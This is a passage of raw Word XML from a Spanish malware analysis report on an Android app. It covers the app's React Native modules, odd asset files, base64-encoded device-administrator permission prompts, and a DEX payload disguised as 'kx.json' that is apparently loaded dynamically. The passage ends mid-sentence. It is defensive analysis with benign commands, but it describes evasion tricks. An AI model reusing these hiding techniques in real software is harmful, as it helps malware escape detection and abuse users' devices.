    <w:p w14:paraId="5C026E35" w14:textId="5E846212" w:rsidR="00631F78" w:rsidRPr="007F5F9C" w:rsidRDefault="00631F78" w:rsidP="007D3625">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Como parte del código </w:t>
      </w:r>
      <w:r w:rsidR="00696228" w:rsidRPr="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontramos numerosas referencias a React, una biblioteca JavaScript de código abierto utilizada mayoritariamente para la creación de aplicaciones web, pero que también permite la creación de aplicaciones</w:t>
      </w:r>
      <w:r w:rsidR="00696228" w:rsidRPr="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> móviles con apariencia nativa para los ecosistemas Android e iOS mediante la biblioteca ReactNative [X].</w:t>
      </w:r>
      <w:r w:rsidR="007F5F9C" w:rsidRPr="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Existen numerosas referencias a ello, con clases como la nombrada “</w:t>
      </w:r>
      <w:r w:rsidR="007F5F9C" w:rsidRPr="007F5F9C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CBeEsOeXuZwJtCjTmMnWhXxZzRrFfXr</w:t>
      </w:r>
      <w:r w:rsidR="007F5F9C" w:rsidRPr="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que también hace uso de </w:t>
      </w:r>
      <w:r w:rsidR="007F5F9C" w:rsidRPr="00005863">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ReactContextBaseJavaModule</w:t>
      </w:r>
      <w:r w:rsidR="007F5F9C" w:rsidRPr="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007F5F9C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esta clase permite la creación de módulos adicionales escritos en el lenguaje de la plataforma, en este caso Java o Kotlin, para no tener que hacer uso elementos del sistema sin tener que escribir código JavaScript adicional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5BFCEE" w14:textId="77777777" w:rsidR="007F5F9C" w:rsidRPr="007F5F9C" w:rsidRDefault="007F5F9C" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5956C80A" w14:textId="77777777" w:rsidR="007F5F9C" w:rsidRPr="007F5F9C" w:rsidRDefault="007F5F9C" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D3E7F00" w14:textId="559AE4CC" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para finalizar esta fase de análisis estático, continuaremos con el análisis de los archivos desempaquetados. En la carpeta de recursos estándar de Android (nombrada “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63148">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>assets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”), podemos encontrar varios ficheros que podrían resultar útiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B029D" w14:textId="75878EB1" w:rsidR="00337CE1" w:rsidRPr="007E6608" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00035060">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se incluyen cuatro certificados con el prefijo “AmazonRootCA”. Tras tratar de obtener información relativa al emisor del certificado mediante OpenSSL (</w:t>
      </w:r>
      <w:r w:rsidRPr="00035060">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>openssl x509 -noout -text -in AmazonRootCA1.cer</w:t>
      </w:r>
      <w:r w:rsidRPr="00035060">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>), tres de ellos no pueden ser leídos correctamente sin ningún fallo específico, mientras que el cuarto certificado presenta errores de estructura que provocan que tampoco se pued</w:t>
      </w:r>
      <w:r w:rsidR="009609E4">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00035060">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cargar</w:t>
      </w:r>
      <w:r w:rsidR="009609E4">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con éxito.</w:t>
      </w:r>
      <w:r w:rsidR="00EE4180">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> La información disponible no permite obtener más detalles acerca de</w:t>
      </w:r>
      <w:r w:rsidR="009A292E">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la autoridad </w:t>
      </w:r>
      <w:r w:rsidR="003A0509">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>detrás</w:t>
      </w:r>
      <w:r w:rsidR="009A292E">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> certificado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFEBD3" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Archivos multimedia de sonido (formato OGG)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que contienen tonos de notificación y sonidos de funciones del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6A644" w14:textId="0A973F2D" w:rsidR="00337CE1" w:rsidRPr="004C3C03"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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Archivos de imagen PNG que contienen parte de la firma hexadecimal de formato PNG (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsia="MS Mincho"/>
        </w:rPr>
        <w:t>89 50 4E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D16014">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, dato comprobado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tras su lectura con la herramienta HexFiend, pero que no pueden ser leídos correctamente por los programas de visualización estándar del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE5436A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="00D80D8B" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Un archivo de texto “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A311CC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hello.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” que está codificado en base64. Tras decodificarlo utilizando la terminal de comandos de Mac (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D80D8B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat hello.txt | base64 -D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). El texto resultante parece estar relacionado con la obtención de permisos, contando con la traducción a múltiples </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>idiomas de numerosos mensajes relativos al proceso de permisos, a continuación, se muestra un extracto de los mensajes en español del fichero:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085819A5" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="002122A9" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"permission_access_only_foreground":["Permitir solo con la app en uso"]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>"allow":["Permitir"]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>"next_label":["Siguiente"]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>"application_info_label":["Información de la</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aplicación"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"Info. de las apps"]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>"service_stop":["Detener"]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>"remove_device_admin":["Desactivar","Desactivar este administrador de dispositivos"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>"Desactivar esta app de administración del dispositivo"]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>"add_device_admin_msg":["¿Deseas activar el administrador del dispositivo?"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>"¿Activar administrador de dispositivos?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30778670" w14:textId="77777777" w:rsidR="002122A9" w:rsidRPr="00F76F9A" w:rsidRDefault="002122A9" w:rsidP="002122A9">
      <w:pPr>
        <w:ind w:left="1420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36DC8424" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="006D3E70" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D3E70">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Varios ficheros JSON haciendo referencia a gráficos vectorizados de Adobe y a algunos de los archivos de imagen que no han podido ser leídos correctamente previamente, con lo que es posible también que se realicen modificaciones en tiempo de ejecución a los archivos multimedia para ocultarlos del análisis estático.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C63192" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un archivo en formato JSON que contiene información relativa a varias regiones y ciudades de China, incluyendo un sistema de codificación y URLs apuntando a archivos ZIP. Las entradas de la lista de ciudades contienen una propiedad llamada “</w:t>
      </w:r>
      <w:r w:rsidRPr="00497DBD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>adcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”, lo que podría indicar un sistema de publicidad con diferentes zonas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02687560" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un archivo con extensión JSON (</w:t>
      </w:r>
      <w:r w:rsidRPr="00602D63">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>kx.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>), que es el que más tamaño tiene (815KB), pero que parece no ser realmente un fichero JSON, ya que no puede ser leído como tal. No obstante, el formato JSON no tiene bytes reconocibles que permitan extraer una firma de formato [X]. Sin embargo, sí que podemos observar la representación hexadecimal del archivo, utilizando nuevamente la herramienta Hex Fiend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B945A" w14:textId="4E09A052" w:rsidR="00337CE1" w:rsidRDefault="000C1FC5" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="0BB58261">
          <v:group id="Group 11" o:spid="_x0000_s2065" alt="" style="position:absolute;left:0;text-align:left;margin-left:84.35pt;margin-top:147.7pt;width:322pt;height:59pt;z-index:20" coordsize="40894,7493">
            <v:shape id="_x0000_s2066" type="#_x0000_t75" alt="" style="position:absolute;width:40894;height:7493;visibility:visible;mso-wrap-style:square">
              <v:imagedata r:id="rId46" o:title="A screenshot of a black background with white text&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
              <o:lock v:ext="edit" aspectratio="f"/>
            </v:shape>
            <v:shape id="Ink 7" o:spid="_x0000_s2067" type="#_x0000_t75" alt="" style="position:absolute;left:27504;top:1574;width:10051;height:230;visibility:visible;mso-wrap-style:square">
              <v:imagedata r:id="rId47" o:title=""/>
              <o:lock v:ext="edit" aspectratio="f"/>
            </v:shape>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtenemos los primeros bytes hexadecimales: </w:t>
      </w:r>
      <w:r w:rsidR="00337CE1" w:rsidRPr="00414664">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>50 4B 03 04</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta secuencia hace referencia al formato comprimido ZIP. Además, en la representación de texto plano del fichero observamos en la primera línea una referencia a </w:t>
      </w:r>
      <w:r w:rsidR="00337CE1" w:rsidRPr="00602D63">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>classes.dex</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, por lo tanto, este podría tal vez ser el archivo que se carga dinámicamente mediante </w:t>
      </w:r>
      <w:r w:rsidR="00337CE1" w:rsidRPr="00E47FA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DexClassLoader</w:t>
      </w:r>
      <w:r w:rsidR="007F15BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F15BD" w:rsidRPr="007F15BD">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>mencionado en el apartado anterior</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46272E8B" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:ind w:left="1420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68315FD6" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493690AC" w14:textId="0F2C72A2" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para comprobar si efectivamente el archivo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00613659">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>kx.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” contiene un archivo DEX de carga dinámica en su interior, procedemos a tratar de abrirlo como un fichero ZIP, y confirmamos que se descomprime y se obtiene un nuevo archivo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00405B27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>classes.dex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">” que aumenta en tamaño hasta </w:t>
      </w:r>
      <w:r w:rsidR="00423AEC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">llegar a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>los 2,2MB. Iniciamos nuevamente el proceso de descompilación de DEX a código Java con JADX</w:t>
      </w:r>
      <w:r w:rsidR="002A5D4F">
        <w:rPr>
